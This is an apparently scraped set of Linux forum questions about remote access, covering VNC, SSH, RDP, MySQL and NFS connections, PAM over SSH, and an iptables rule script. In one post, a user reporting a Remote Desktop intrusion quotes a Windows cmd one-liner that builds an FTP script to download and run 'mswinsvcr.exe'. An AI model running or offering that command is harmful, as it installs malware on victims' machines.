CentOS 5 :: 5.6 Upgrade - Security For Remote Access?
Aug 19, 2011
I setup a remote web server yesterday evening, which had Centos 5.3 on it. This went well, and I did this mostly over vnc, to get a GUI. However, I hadn't realised that there was a pending cron job to 'yum upgrade'. So, come 2am, 5.3 turned into 5.6. I carried on the install today, but after some time (I'm not sure exactly how or when), I lost the ability to run any GUI system config tools that required root login. I also lost the ability to run anything graphical - emacs, for example, when I was already root in an xterm.
/var/log/secure isn't telling me anything. It claims that it's running the config tool on my behalf, but nothing happens. If I try to run emacs, I get a message saying that the X server isn't responding. Could this be related to the upgrade? It feels like a PolicyKit problem - I've seen something similar on 6.0 for remote access over vnc - but 5.6 isn't running PolicyKIt.
how i can remote access my pc at home from work ? on different pc that has access to INTERNET. what software shall I install on my pc at home ? I want to be able to install software on my pc at home from my work place, my home pc has unbuntu Linux ubuntu 2.6.31-17-generic #54-Ubuntu SMP Thu Dec 10 17:01:44 UTC 2009 x86_64 GNU/Linux
Is it possible to remotely access, inject, manipulate files and/or folders in the Windows NTFS partition when logged into Ubuntu?
I'm either logged into Windows or Ubuntu but NOT both -- ever. Therefore, while logged into Ubuntu, would it be possible for someone to crack into Windows via Ubuntu using Wi-Fi or modem?
I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
I'm using a fingerprint reader on my laptop, works pretty well:
Code: $sudo echo hi Please swipe your finger: [swipe finger here of course]
[Code]....
Like I said, it works nicely... until I try to SSH in and sudo something remotely, when it will ask me kindly to swipe my finger over the reader that's attached to the laptop which is on my desk at home thirty kilometres away. Naturally there's no method built into pam_fprint to abort via a keypress.
So, is there any way to tell PAM to only use certain modules if I'm in a locally logged in session?
What I want to do is pull data from any of the hard drives attached to my Linux box from my Windows machine. I have been moving small amounts of data from the drives to my OS drive and those parts share easily, but I want to move away from that method to move large amounts of data at the same time.I have tried using Samba as it is used for file sharing between systems and that I have to give my Windows box permission through Samba.
Trick is, I'm not sure where to start, though I have an idea and wanted to know if this is the right track before I start editing my file system.
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing Code: %systemroot%system32cmd.exe del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this: Code: %systemroot%system32cmd.exe del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
Newbie on the block with Centos 5.3 on a test server and and Ubuntu on a test workstation Note the wiki on VNC for a windows workstation but presume I could do this more easily from "Jaunty" (Ubuntu v 9.04)
I have a cent 5.5 server that I only have remote access to. I was wondering if there was a way to view potential updates before I issue the yum update command. I know that there is a notification in X that you can click on and will show you the updates before you actually perform the operation.
I was able to install and start tftp.I can tftp localhost and get a file, even from a non-administrator login.I can connect from a remote host, but the *get* times out.I suspect there is a security issue. Can you tell me how to lower the security on tftp so that a remote host can do gets?
when client goes to bind to NFS share on remote server - they are getting access denied when using the mount command; [SERVER] - CentOS 5.3 /etc/exports /mnt/data 192.168.5.199(rw) - implying the client I want to have access
I setup mysql v5 on centos, follow all the instruction i was able to google for to enable remote access, I am able to log in to -h localhost and -h (external IP address) from same server, I am able to telnet to 3306 using localhost and external ip address, BUT when I try to connect from deferent server i get host unreachable error H3000 (113) and telnet also is not able to connect via port 3306 I covered all the bases but stii no luck. same setup works for slackware no problem and there is no issue with client.
How can i connect to FortiGate1 SSL VPN Remote Access router from Fedora/CentOS or Ubuntu/Debian?It only working with Windows Internet explorer for the moment using Vbox (But i cant use Windows only for this)How can i use it from my favourate Linux?
# vpnc Enter IPSec gateway address: xx.xx.xx.42 Enter IPSec ID for xx.xx.xx.42:
I have a fiberoptic broadband 20MB synchronous pipe at my home. Over summer at my place of employment its pretty much dead for 3 months so when I'm not busy I play around on my home server. I have my 20mb pipe going directly into my wrt54gl, from there I have a wired connection going to my server (Centos 5.3 recently upgraded to 5.5 through updates.) It serves as a file server(Samba, SSH). My wrt54gl handles natting port 22 to my server. I have my wireless AP setup to hand out leases from .2-.20 and my server has a static of .100. Dyndns.org handles my name resolution via their free account method.
I have a Mac Pro, iMac, Macbook, and a Toshiba Laptop with 64bit 7 running off wireless along with our cell phones, and my XBOX 360 also is wired directly for the gaming speed. I use all of the computers around my home to access the samba shares via unc path for file sharing and or working on projects. I had originally planned to upgrade the wrt54gl with a cisco e3200 or an e3000 but unfortunately I've come to find out dyndns and the e lines of cisco wireless AP's dont work with dyndns and get banned. So I would have to install the daemon on my server and put it as a directly connected server to my WAN link and install a second ethernet card and pass traffic through my server for the rest of my home which I am not going to do.
All of the previous sentence because it would update dyndns with a 192.168.x.x address since its not directly connected. I use a combination of putty.exe and vnc viewer to tunnel 5900 through port 22 to my server. So from anywhere I am at I can access my screen securely and then rdp or vnc to the desktop of my local LAN computers. This allows me to only have port 22 open. I've been looking at my ssh logs and noticed I have been getting hit alot with ssh scans. I want to implement an iptables firewall on my linux machine just for the purpose of further securing port 22. I dont necessarily need natting on the iptables firewall but all I need is ssh in and out, web in, and samba out to local ip's only.
For SSH this is what I want. I want to allow SSH from any IP but if it tries to login more than 3 times in one minute I want to block that IP for a full minute before it can try 3 more attempts. I also would like log to a file but have been having issues getting that to work as well. That way when I review logs and I see that an ip tries three times and then waits a minute and tries three more, etc... I can permanently block that ip or range of ip's by adding it to the iptables script. Here is my current iptables script and it doesnt seem to be working for me. I have played with this and read for almost two weeks and still cannot get it to work correctly.
Code: #!/bin/bash # In order to use this iptables firewall script you must have iptables installed. You also must be using a 2.4.x series Kernel, with iptables suppport compiled into it, which is standard for most newer linux distributions. # If you need help compiling iptables into your kernel, please see our kernel Compile/Upgrade Guide located at [URL] # Once the script has been edited with all your relevant information (IP's Network Interfaces, etc..) simply make the script executable and run it as root. # chmod 700 fw_rules.sh # ./fw_rules.sh .....
# Our final trap. Everything on INPUT goes to the dropwall # So we don't get silent drops. $IPT -A INPUT -j dropwall
I have just installed CentOS 5. I have set mysql database to access from remote machines. But now the problem is it is not connecting from the local machine now.
Im using CentOs on a remote server. I've recently installed phpmyadmin but cant access from [URL] I checked the files and found only 3 folders in /var/lib/phpmyadmin -config / save / upload - all of them empty. Whenever I try intstall phpmyadmin again it just says its already installed and up to day.
I always use VNC to check my server for updates, and this morning I started the xvnc4viewer to vnc into my server and it keep asking for a password. I never setup a password because I do this local from my laptop, and I am the only one who uses my laptop. I had to go to my server and check the setting in System > Preferences > Remote Desktop and found them all changed. There was a password setup and there was a check mark in the you must confirm each access to this machine there some security update that changed all these setting? Sometimes when I do updates I don't know what is being changed on my server
So I've read a bit and it seems that this is okay and secure. But I wanted to double check here with everyone, because I trust here more than just about anywhere. I've read about the hipporemote (which is pretty cool) and I have it working. Basically I want to make sure my system is still secure.
1. I had to open a port on my firewall for the VNC connection.
2. I turned on the Remote Desktop 2a. Checked Allow other users to view.... 2b. Checked Allow other users to control.... 2c. Checked You must confirm..... 2d. Checked for password, and put in a password 2e. Checked Configure network automatically to accept connectios
So with doing all of that, am I ok? I think so, especially since it says its only accessible on my local network. But I just wanted to hear from people who know more than I do that I don't need to worry any more than normal about others accessing my machine. I'm mainly thinking 2e, I don't fully understand what's going on there.
I have two Centos 5 servers one running Asterisk with PHP installed and another sever running as a MySql Database server, at the moment when I try run simple script to see if I can connect to the remote server I get the following error.Quote:Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)
We are on our first Linux platform and I am trying to coordinate a distributed application backup across multiple machines. I am trying to write a script in which I would have used RSH to execute scripts on the other servers. We are no longer allowed to use rsh, and someone suggested ssh. I am using that instead of telnet, but I am not sure of the syntax"rsh server [-n] path/executable" is what I would have used, just not sure of the syntax for ssh
iam not able remote login , while yesterday i was able to login . when i do ssh my machine from other machine he asked for passord . after that it give erroe permisson denied . but i was able same password yesterday.. same issue was yesterday .
when i install fresh cent os 5.5 . after it work well till night. but next day morning . we are not able to remoe login .
I'm currently in the last steps of migrating a CentOS mailserver to the x64 version.However, under the old 32 bit version, I was using XRDP to access the Centos box from my Windows boxes.However I can't seem to find the XRDP package in the standard repos so this is prompting me to look at possible alternatives (XRDP was incompatible with my windows 7 box anyway soI had to RDP to another server of ours running 2003 to RDP into the mailserver which was far from ideal).Basically, I'd like to be able to seamlessly access the Centos box with a standard RDP client.
I know VNC Server/Clients would be an option but RDP gives me the freedom of any windows box being able to access the server on the same adress/port without installing software on any windows box I encounter.Are there any viable alternatives to XRDP ?There's no "add-on" to VNC server that could enable it to accept RDP connections ?
My company blocked port 22/23 for telnet and SSH which would have been quite nice to access my box at home.I found a page on the net (URL...) which works perfectly fine, but due a demo version stops after 20 seconds.Does anybody know a similar page or any other way I could remote access my PC?
I installed teamviewer recently. I can remotely access a windows system from my fedora machine. But i cannot access my fedora machine from the windows machine.
The windows machine is unable to connect to the fedora machine. Do I need to open some ports on fedora machine ?
My home network consists of two computers that share one internet connection via a router. I have a desktop computer that runs Ubuntu (Karmic), connected via ethernet; and a netbook that runs Windows 7 (will be Ubuntu, eventually), which connects wirelessly. Both computers have multiple user accounts. What I would like to do is access my account on the Ubuntu desktop via the netbook while my wife is using the desktop with her account (or enable her to access her account on the desktop while I am using it). I looked into VNC, but it, apparently, only supports the active desktop. So, if someone connected to the computer while it was in use, they would be looking at the other user's desktop. Is this a misconception on my part?
So, I have 3 questions: -From the netbook, how can I log into my account on the desktop and just get a command-line shell? - From the netbook, how can I log into my account on the desktop and actually have access to my Gnome desktop? - If I leave my house with the netbook, and want to log into my desktop machine across the internet (CLI and/or Gnome), how can I do that?
I have a Windows 7 (Home Premium) computer and another computer with a fresh installation of Ubuntu 10.04 (32-Bit) on it. Since I have the computer with Windows 7 and it doesn't come with Remote access due to it not being at least the Professional edition (which is really lame if you ask me!), I won't be able to access my Windows computer from my Ubuntu computer (from what I have gathered from [URL].. So my question is how can I access my Ubuntu computer from my Windows 7 machine? Does this require more then just installing Samba on the linux machine? I do have RealVNC Enterprise edition 4.51 if that will work?
I can't seem to remotely SSH or VNC into my machine. If I'm on the LAN and try accessing via LAN IP, it works fine. If i go in through a remote address (my dyndns) or even my home IP, I can't connect (yes, all of the ports are forwarded, I've triple checked this multiple times). Interestingly enough, port 80 works just fine. It would seem as though some sort of firewall is blocking me. I've done this plenty of times before with various machines, and this has me quite perplexed.
I'm relatively new to linux. I was wondering if there is any program available that will remotely access my iPhone. I have seen programs that let me controll my PC using my iPhone but i would like the other way around. The girlfriend doesn't have internet access at home and she's always texting me. Well if I find a program that lets me remotely access my device I can text her back without leaving the keyboard. OS: Ununtu 10.10 iPhone 3G Jailbroken (3.1.3)
New member here just looking for a solution for remote access over LAN and the internet. I've known Linux for seven years but have only begun working with it extensively the past couple months. I had recently tried a couple free VNC solutions but ended up giving up when nothing worked. TeamViewer ended up not working properly either and instead crashed at the end of each session. Any chance there's a simple solution to this?
